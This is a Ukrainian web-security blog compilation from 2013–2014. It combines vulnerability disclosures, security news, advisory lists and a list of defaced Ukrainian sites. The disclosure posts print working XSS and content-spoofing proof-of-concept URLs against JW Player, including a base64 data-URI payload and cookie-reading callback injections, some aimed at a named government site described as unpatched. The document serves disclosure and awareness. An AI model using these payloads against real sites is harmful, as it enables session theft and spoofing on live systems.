Websecurity - Веб безпека

13.11.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в DSMS. Які я виявив на dsmsu.gov.ua. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

15.02.2014

XSS (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

XSS (WASC-08):

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

Content Spoofing (WASC-12):

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

В системі є й інші дірки, про які я повідомив розробникам. Дані уразливості досі не виправлені.

За повідомленням www.xakep.ru, технічні деталі DDoS-атаки з NTP-посиленням.

Компанія Cloudflare розголосила технічні деталі найбільшої DDoS-атаки з NTP-посиленням, про яку повідомлялося 10 лютого.

Фахівці говорять, що вони і раніш бачили DDoS-атаки на 400 Гбит/с, але вперше така атака використовує метод посилення UDP-трафіка саме через сервери мережевого часу NTP. Це нова загроза для мережі, вважає Cloudflare.

За повідомленням www.opennet.ru, ініціатива по організації незалежного аудита Firefox.

Бренден Айк, творець мови JavaScript, що займає посаду технічного директора Mozilla Corporation, запропонував організувати процес незалежної безупинної верифікації кодової бази Firefox. Для того, щоб гарантувати неможливість впровадження в продукт коду для здійснення стеження й інших прихованих дій.

Сліпої довіри виробнику і його заслуженій репутації недостатньо, тому що діючі в США законодавчі акти дозволяють примусити виробника до здійснення дій, що йдуть врозріз з тими принципами, яких вони дотримують в області безпеки і приватності.

За повідомленням www.ruskur.ru, хакери взломали поштовий сервіс Yahoo.

Американська інтернет-корпорація Yahoo повідомила своїм передплатникам про те, що її поштовий сервіс піддався атаці хакерів - у їх розпорядженні виявилися паролі від користувацьких акаунтів. Про це повідомляється в прес-релізі компанії.

У Yahoo також упевнені, що логіни і паролі від користувацьких скриньок були викрадені не зі сховища компанії, а від третьої сторони.

Виявлений витік інформації в cURL.

Уразливі продукти: cURL 7.34, libcurl 7.34.

При використанні NTLM-аутентифікації запит може бути відправлений через невірне з’єднання.

• curl security update (деталі)

В даній добірці уразливості в веб додатках:

• Command Injection via CSRF on DD-WRT v24-sp2 (деталі)
• Blind SQL Injection in Ops View (деталі)
• Multilple Cross Site Scripting (XSS) Attacks in Ops View (деталі)
• ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability (деталі)
• Exploit Tool Targets Vulnerabilities in McAfee ePolicy Orchestrator (ePO) (деталі)

У лютому, 04.02.2013, вийшов Mozilla Firefox 27. Нова версія браузера вийшла через два місяці після виходу Firefox 26.

Mozilla офіційно випустила реліз веб-браузера Firefox 27, а також мобільну версію Firefox 27 для платформи Android. Відповідно до шеститижневого циклу розробки, реліз Firefox 28 намічений на 18 березня, а Firefox 29 на 29 квітня.

Також був випущений Seamonkey 2.24 та оновлені гілки із тривалим терміном підтримки Firefox 24.3.0 і Thunderbird 24.3.0.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 27.0 усунуто 13 уразливостей, серед яких 4 позначені як критичні, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок. Причому ця кількість - це саме патчі (Mozilla типово виправляє по декілька дір за один патч).

• Увидел свет Firefox 27 (деталі)

Виявлена можливість виконання коду в Microsoft Forefront Protection for Exchange.

Уразливі версії: Microsoft Forefront Protection 2010 for Exchange Server.

Виконання коду при розборі листа.

• Microsoft Security Bulletin MS14-008 - Critical Vulnerability in Microsoft Forefront Protection for Exchange Could Allow Remote Code Execution (2927022) (деталі)

Продовжуючи розпочату традицію, після попереднього відео про DoS експлоіт для WordPress, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Adobe Flash Player. Рекомендую подивитися всім хто цікавиться цією темою.

CVE-2012-0779 APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

В даному відео ролику демонструється використання експлоіта для проведення атаки на уразливість в Adobe Flash Player 11.2. Який призводить до віддаленого виконання коду в браузері з Flash плагіном (показано на прикладі браузера IE6) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером.

Атака відбувається при відвідуванні в браузері з флеш плагіном спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

30.10.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

14.02.2014

Уразливості в JW Player я описав в попередні роки.

XSS:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Та інші XSS уразливості в JW Player.

Content Spoofing:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Та інші CS уразливості в JW Player.

На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.scourt.gov.ua (хакером LOST SOULS) - 04.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.vlada-yahotyn.gov.ua (хакерами з Suram-Crew) - 02.01.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://cabel-provod.com (хакером Sejeal) - 08.08.2013, зараз сайт не працює
• http://carsystems.com.ua (хакером fallag tnx hani xavi) - 09.12.2013, зараз сайт вже виправлений адмінами
• http://www.fotki.zp.ua (хакером fallag tnx hani xavi) - 09.12.2013, зараз сайт вже виправлений адмінами

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 26.0, Firefox ESR 24.2, Thunderbird 24.2, Seamonkey 2.23.

Численні пошкодження пам’яті, міжсайтовий скриптінг, DoS, витік інформації.

• Mozilla Foundation Security Advisory 2014-01 (деталі)
• Mozilla Foundation Security Advisory 2014-02 (деталі)
• Mozilla Foundation Security Advisory 2014-03 (деталі)
• Mozilla Foundation Security Advisory 2014-04 (деталі)
• Mozilla Foundation Security Advisory 2014-05 (деталі)
• Mozilla Foundation Security Advisory 2014-06 (деталі)
• Mozilla Foundation Security Advisory 2014-07 (деталі)
• Mozilla Foundation Security Advisory 2014-08 (деталі)
• Mozilla Foundation Security Advisory 2014-09 (деталі)
• Mozilla Foundation Security Advisory 2014-10 (деталі)
• Mozilla Foundation Security Advisory 2014-11 (деталі)
• Mozilla Foundation Security Advisory 2014-12 (деталі)
• Mozilla Foundation Security Advisory 2014-13 (деталі)
• Mozilla Foundation Security Advisory 2014-14 (деталі)